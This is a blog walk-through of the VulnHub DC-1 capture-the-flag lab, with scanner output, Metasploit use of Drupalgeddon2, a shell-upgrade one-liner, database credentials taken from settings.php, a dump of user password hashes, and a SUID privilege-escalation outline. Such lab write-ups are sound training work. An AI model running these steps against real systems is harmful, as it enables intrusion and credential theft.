Posted on

DC-1 Walk-Through

Today we will check on the DC series from Vulnhub very great series to begin for Pen testing and to keep a fresh mind for practicing some hacking let’s begin.

Started with a arp-scan to find the target box

Started with a arp-scan to find the target box

dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo arp-scan -l
Interface: eth0, datalink type: EN10MB (Ethernet)
Starting arp-scan 1.9.5 with 256 hosts (https://github.com/royhills/arp-scan)
10.140.1.1	a4:08:f5:53:18:56	(Unknown)
10.140.1.174	f4:f5:d8:d1:b8:4e	Google, Inc.
10.140.1.172	00:c0:ca:96:e7:91	ALFA, INC.
10.140.1.171	30:d9:d9:54:6f:e2	(Unknown)
10.140.0.160	08:00:27:d6:33:69	Cadmus Computer Systems
10.140.1.179	84:4b:f5:63:d7:74	Hon Hai Precision Ind. Co.,Ltd.
10.140.1.176	98:ca:33:9f:5f:a6	(Unknown)

7 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.5: 256 hosts scanned in 2.187 seconds (117.06 hosts/sec). 7 responded

Proceeded with a full port scan and then moved on with a more targeted scan on any open ports found

dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo nmap 10.140.0.160 -p- -sT --min-rate 5000
Starting Nmap 7.80 ( https://nmap.org ) at 2019-08-28 02:57 PDT
Nmap scan report for DC-1 (10.140.0.160)
Host is up (0.00016s latency).
Not shown: 65531 closed ports
PORT      STATE SERVICE
22/tcp    open  ssh
80/tcp    open  http
111/tcp   open  rpcbind
44820/tcp open  unknown
MAC Address: 08:00:27:D6:33:69 (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 13.09 seconds

Nikto scan come’s back with many false positives but by visiting port 80 we can filter the results to match the CMS we have encountered previously

dmcxblue@kali:~/Documents/vulnhub/DC1$ nikto -h http://10.140.0.160/ -o nikto-DC1.txt
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP:          10.140.0.160
+ Target Hostname:    10.140.0.160
+ Target Port:        80
+ Start Time:         2019-08-28 11:57:33 (GMT-7)
---------------------------------------------------------------------------
+ Server: Apache/2.2.22 (Debian)
+ Retrieved x-powered-by header: PHP/5.4.45-0+deb7u14
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'x-generator' found, with contents: Drupal 7 (http://drupal.org)
+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type
+ Server may leak inodes via ETags, header found with file /robots.txt, inode: 152289, size: 1561, mtime: Wed Nov 20 12:45:59 2013
+ Entry '/INSTALL.mysql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.pgsql.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/INSTALL.sqlite.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/install.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/LICENSE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/MAINTAINERS.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/UPGRADE.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/xmlrpc.php' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=filter/tips/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/password/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/register/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Entry '/?q=user/login/' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ "robots.txt" contains 36 entries which should be manually viewed.
+ OSVDB-39272: /misc/favicon.ico file identifies this app/server as: Drupal 7.x
+ Apache/2.2.22 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ DEBUG HTTP verb may show server debugging information. See http://msdn.microsoft.com/en-us/library/e8z01xdh%28VS.80%29.aspx for details.
+ OSVDB-3092: /web.config: ASP config file is accessible.
+ /nsn/fdir.bas:ShowVolume: A database error may reveal internal details about the running database.
+ /nsn/fdir.bas: A database error may reveal internal details about the running database.
+ /servlet/webacc: A database error may reveal internal details about the running database.
+ /forum/admin/database/wwForum.mdb: A database error may reveal internal details about the running database.

--Snip--
Nikto Scan

After a few day’s [JK] results are back from our droopescan

dmcxblue@kali:~/Documents/vulnhub/DC1$ droopescan scan drupal -u http://10.140.0.160/
[+] Plugins found:                                                              
    ctools http://10.140.0.160/sites/all/modules/ctools/
        http://10.140.0.160/sites/all/modules/ctools/LICENSE.txt
        http://10.140.0.160/sites/all/modules/ctools/API.txt
    views http://10.140.0.160/sites/all/modules/views/
        http://10.140.0.160/sites/all/modules/views/README.txt
        http://10.140.0.160/sites/all/modules/views/LICENSE.txt
    image http://10.140.0.160/modules/image/
    profile http://10.140.0.160/modules/profile/
    php http://10.140.0.160/modules/php/

[+] Themes found:
    seven http://10.140.0.160/themes/seven/
    garland http://10.140.0.160/themes/garland/

[+] Possible version(s):
    7.22
    7.23
    7.24
    7.25
    7.26

[+] Possible interesting urls found:
    Default admin - http://10.140.0.160/user/login

[+] Scan finished (0:12:01.481775 elapsed)
droopescan Results

By enumerating with searchsploit with the following command

searchsploit Drupal 7

We get a handful of results but we try to filter them to get code execution and such since these results can be filter because
we don’t see any attack vectors for the other vulnerabilities such as [Authenticated] or [SQL] we will skip those
and go for Drupalgeddon2

dmcxblue@kali:~/Documents/vulnhub/DC1$ searchsploit Drupal 7
---------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                |  Path
                                                                                              | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------- ----------------------------------------
Drupal 4.7 - 'Attachment mod_mime' Remote Command Execution                                   | exploits/php/webapps/1821.php
Drupal 4.x - URL-Encoded Input HTML Injection                                                 | exploits/php/webapps/27020.txt
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Add Admin User)                             | exploits/php/webapps/34992.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Admin Session)                              | exploits/php/webapps/44355.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (1)                   | exploits/php/webapps/34984.py
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (PoC) (Reset Password) (2)                   | exploits/php/webapps/34993.php
Drupal 7.0 < 7.31 - 'Drupalgeddon' SQL Injection (Remote Code Execution)                      | exploits/php/webapps/35150.php
Drupal 7.12 - Multiple Vulnerabilities                                                        | exploits/php/webapps/18564.txt
Drupal 7.x Module Services - Remote Code Execution                                            | exploits/php/webapps/41564.php
Drupal < 4.7.6 - Post Comments Remote Command Execution                                       | exploits/php/webapps/3313.pl
Drupal < 5.22/6.16 - Multiple Vulnerabilities                                                 | exploits/php/webapps/33706.txt
Drupal < 7.34 - Denial of Service                                                             | exploits/php/dos/35415.txt
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code (Metasploit)                      | exploits/php/webapps/44557.rb
Drupal < 7.58 - 'Drupalgeddon3' (Authenticated) Remote Code Execution (PoC)                   | exploits/php/webapps/44542.txt
Drupal < 7.58 / < 8.3.9 / < 8.4.6 / < 8.5.1 - 'Drupalgeddon2' Remote Code Execution           | exploits/php/webapps/44449.rb
Drupal Module CKEditor < 4.1WYSIWYG (Drupal 6.x/7.x) - Persistent Cross-Site Scripting        | exploits/php/webapps/25493.txt
Drupal Module Coder < 7.x-1.3/7.x-2.6 - Remote Code Execution                                 | exploits/php/remote/40144.php
Drupal Module Cumulus 5.x-1.1/6.x-1.4 - 'tagcloud' Cross-Site Scripting                       | exploits/php/webapps/35397.txt
Drupal Module Drag & Drop Gallery 6.x-1.5 - 'upload.php' Arbitrary File Upload                | exploits/php/webapps/37453.php
Drupal Module Embedded Media Field/Media 6.x : Video Flotsam/Media: Audio Flotsam - Multiple  | exploits/php/webapps/35072.txt
Drupal Module RESTWS 7.x - PHP Remote Code Execution (Metasploit)                             | exploits/php/remote/40130.rb
Drupal avatar_uploader v7.x-1.0-beta8 - Arbitrary File Disclosure                             | exploits/php/webapps/44501.txt
---------------------------------------------------------------------------------------------- ----------------------------------------
Shellcodes: No Result
Papers: No Result

I initiated MSFCONSOLE and searched for drupal exploits one coming back with the same results as searchsploit

dmcxblue@kali:~/Documents/vulnhub/DC1$ sudo msfconsole
                                                  
IIIIII    dTb.dTb        _.---._
  II     4'  v  'B   .'"".'/|\`.""'.
  II     6.     .P  :  .' / | \ `.  :
  II     'T;. .;P'  '.'  /  |  \  `.'
  II      'T; ;P'    `. /   |   \ .'
IIIIII     'YvP'       `-.__|__.-'

I love shells --egypt


       =[ metasploit v5.0.42-dev                          ]
+ -- --=[ 1915 exploits - 1074 auxiliary - 330 post       ]
+ -- --=[ 556 payloads - 45 encoders - 10 nops            ]
+ -- --=[ 4 evasion                                       ]

msf5 > search drupal

Matching Modules
================

   #  Name                                           Disclosure Date  Rank       Check  Description
   -  ----                                           ---------------  ----       -----  -----------
   0  auxiliary/gather/drupal_openid_xxe             2012-10-17       normal     Yes    Drupal OpenID External Entity Injection
   1  auxiliary/scanner/http/drupal_views_user_enum  2010-07-02       normal     Yes    Drupal Views Module Users Enumeration
   2  exploit/multi/http/drupal_drupageddon          2014-10-15       excellent  No     Drupal HTTP Parameter Key/Value SQL Injection
   3  exploit/unix/webapp/drupal_coder_exec          2016-07-13       excellent  Yes    Drupal CODER Module Remote Command Execution
   4  exploit/unix/webapp/drupal_drupalgeddon2       2018-03-28       excellent  Yes    Drupal Drupalgeddon 2 Forms API Property Injection
   5  exploit/unix/webapp/drupal_restws_exec         2016-07-13       excellent  Yes    Drupal RESTWS Module Remote PHP Code Execution
   6  exploit/unix/webapp/drupal_restws_unserialize  2019-02-20       normal     Yes    Drupal RESTful Web Services unserialize() RCE
   7  exploit/unix/webapp/php_xmlrpc_eval            2005-06-29       excellent  Yes    PHP XML-RPC Arbitrary Code Execution


msf5 >

Chose the following Exploit then added the parameters needed to attack the box

Executed the exploit and received a meterpreter shell

A simple ls for listing directories will show me that there is a flag1.txt file I will proceed to cat the file and view it’s contents

www-data@DC-1:/var/www$ cat flag1.txt
cat flag1.txt
Every good CMS needs a config file - and so do you.

After researching directories and config file paths for drupal I found the 2 Flag

www-data@DC-1:/var/www/sites/default$ cat settings.php
cat settings.php
<?php

/**
 *
 * flag2
 * Brute force and dictionary attacks aren't the
 * only ways to gain access (and you WILL need access).
 * What can you do with these credentials?
 *
 */

$databases = array (
  'default' => 
  array (
    'default' => 
    array (
      'database' => 'drupaldb',
      'username' => 'dbuser',
      'password' => 'R0ck3t',
      'host' => 'localhost',
      'port' => '',
      'driver' => 'mysql',
      'prefix' => '',
    ),
  ),
);

/**
 * Access control for update.php script.

These credentials seem to be used for a Database as we can tell from the driver it is using mysql but we did not find a port open to mysql
from within nmap, that’s because it is listening locally and not exposed to the Network. We can verify that with netstat

www-data@DC-1:/var/www$ netstat -antp
netstat -antp
(Not all processes could be identified, non-owned process info
 will not be shown, you would have to be root to see it all.)
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:25            0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:40067           0.0.0.0:*               LISTEN      -               
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      -               
tcp        0      0 0.0.0.0:111             0.0.0.0:*               LISTEN      -               
tcp        0      0 10.140.0.160:33825      10.140.0.161:4444       ESTABLISHED 3456/php        
tcp6       0      0 :::22                   :::*                    LISTEN      -               
tcp6       0      0 :::58006                :::*                    LISTEN      -               
tcp6       0      0 ::1:25                  :::*                    LISTEN      -               
tcp6       0      0 :::111                  :::*                    LISTEN      -               
tcp6       0      0 :::80                   :::*                    LISTEN      -               
tcp6       1      0 10.1

We notice that when we use mysql command we add everything correctly but get no output from this, the fix is using python or any other tool that will help you UPGRADE your shell I used python here as it was available

python -c 'import pty;pty.spawn("/bin/bash")'

Moving around the DB we find a users tables show I will dump everything from there and view it’s contents

mysql> SELECT * FROM users;
SELECT * FROM users;
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
| uid | name  | pass                                                    | mail              | theme | signature | signature_format | created    | access     | login      | status | timezone            | language | picture | init              | data |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
|   0 |       |                                                         |                   |       |           | NULL             |          0 |          0 |          0 |      0 | NULL                |          |       0 |                   | NULL |
|   1 | admin | $S$DvQI6Y600iNeXRIeEMF94Y6FvN8nujJcEDTCP9nS5.i38jnEKuDR | admin@example.com |       |           | NULL             | 1550581826 | 1550583852 | 1550582362 |      1 | Australia/Melbourne |          |       0 | admin@example.com | b:0; |
|   2 | Fred  | $S$DWGrxef6.D0cwB5Ts.GlnLw15chRRWH2s1R3QBwC0EkvBQ/9TCGg | fred@example.org  |       |           | filtered_html    | 1550581952 | 1550582225 | 1550582225 |      1 | Australia/Melbourne |          |       0 | fred@example.org  | b:0; |
+-----+-------+---------------------------------------------------------+-------------------+-------+-----------+------------------+------------+------------+------------+--------+---------------------+----------+---------+-------------------+------+
3 rows in set (0.00 sec)

mysql>

Hashes We will continue by cracking them

We utilized hashcat on a Windows Box to crack the hashes found on the SQL Database

Logged in as Admin

Found a Flag 3 post

We will go back to our Shell and view any Permissions that will help us escalate PRIVS or to get the passwd file

The find binary has root privileges so this might be it for our help in root privesc a few

I used GTFOBins to find Privilege escalation options for the specific binary

With this we finally receive the final flag

Leave a Reply

Fill in your details below or click an icon to log in:

Gravatar
WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Cancel

Connecting to %s